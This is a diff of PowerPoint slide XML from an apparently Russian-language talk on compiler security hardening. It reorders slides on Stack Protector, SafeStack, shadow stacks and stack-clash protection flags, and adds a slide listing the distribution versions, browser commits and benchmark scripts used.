-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
-            </a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Воспроизведение результатов</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -33801,7 +34241,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33814,128 +34254,198 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включен по умолчанию только в компиляторе </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu GCC</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Windows</a:t>
+              <a:t>Версии дистрибутивов</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рекомендуется явно указывать флаг </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protector-strong</a:t>
-            </a:r>
+              <a:t>Проверялись последние </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" i="1" dirty="0"/>
+              <a:t>стабильные</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> версии</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пакеты в Debian</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> Fedora</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ubuntu собираются с этим флагом</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian 12 (bookworm), Fedora 42, Ubuntu 24.04 (noble)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Версии браузеров</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://github.com/mozilla-firefox/firefox</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>коммит </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>b0ca903b</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>https://chromium.googlesource.com/chromium/src</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>коммит </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>d0273f3d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён в релизной сборке </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>включён слабый вариант </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Protector</a:t>
+              <a:t>Замеры производительности </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Компилировали </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CGBuiltin.cpp c -O2 (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>самый большой файл)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/bench</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Подсчёт</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> CVE/KEV</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>-метрик</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/scripts</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пруфлинки и дополнительная информация доступны в файле</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/plan.md</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -33945,7 +34455,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7662A858-B371-4A36-A1C4-9B73D86F1E18}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD3E67F-01FC-47C1-BE9B-97F0109DAF0E}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33972,7 +34482,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293187664"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -34004,7 +34514,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495A52BD-3FC7-4579-8A9D-D005960A9C1C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34022,7 +34532,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Safe Stack: </a:t>
+              <a:t>Stack Protector: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -34040,7 +34550,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AA46AE-2AEA-42A0-B331-598916A3F385}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34053,28 +34563,58 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Несколько реализаций:</a:t>
+              <a:t>Включен по умолчанию только в компиляторе </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Windows</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>SafeStack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рекомендуется явно указывать флаг </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
@@ -34085,141 +34625,67 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=safe-stack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>наиболее распространённый флаг)</a:t>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protector-strong</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пакеты в Debian</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> Fedora</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ubuntu собираются с этим флагом</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Intel CET Shadow Stack:</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> не реализован (нельзя включить ни по</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fcf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protection</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>ни по </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>–</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>mshstk</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ShadowCallStack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=shadow-call-stack</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Защита не включена по умолчанию в дистрибутивах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и браузерах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome/Firefox</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в релизной сборке </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включён слабый вариант </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Protector</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -34228,7 +34694,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8A2AE2-629B-42FD-9E28-E4A1D19A5BF3}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7662A858-B371-4A36-A1C4-9B73D86F1E18}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34255,7 +34721,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1796431697"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293187664"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -34632,7 +35098,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495A52BD-3FC7-4579-8A9D-D005960A9C1C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34650,11 +35116,11 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Clashing: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как использовать</a:t>
+              <a:t>Safe Stack: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -34668,7 +35134,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AA46AE-2AEA-42A0-B331-598916A3F385}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34682,48 +35148,24 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включен по умолчанию только в компиляторе </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu GCC</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang)</a:t>
+              <a:t>Несколько реализаций:</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рекомендуется явно указывать флаг </a:t>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>SafeStack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
@@ -34737,29 +35179,59 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-clash-protection</a:t>
-            </a:r>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=safe-stack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>наиболее распространённый флаг)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пакеты в Debian</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> Fedora</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Intel CET Shadow Stack:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> не реализован (нельзя включить ни по</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fcf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protection</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -34767,144 +35239,78 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ubuntu собираются с этим флагом</a:t>
+              <a:t>ни по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>–</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>mshstk</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>ShadowCallStack</a:t>
+            </a:r>
+            <a:r>
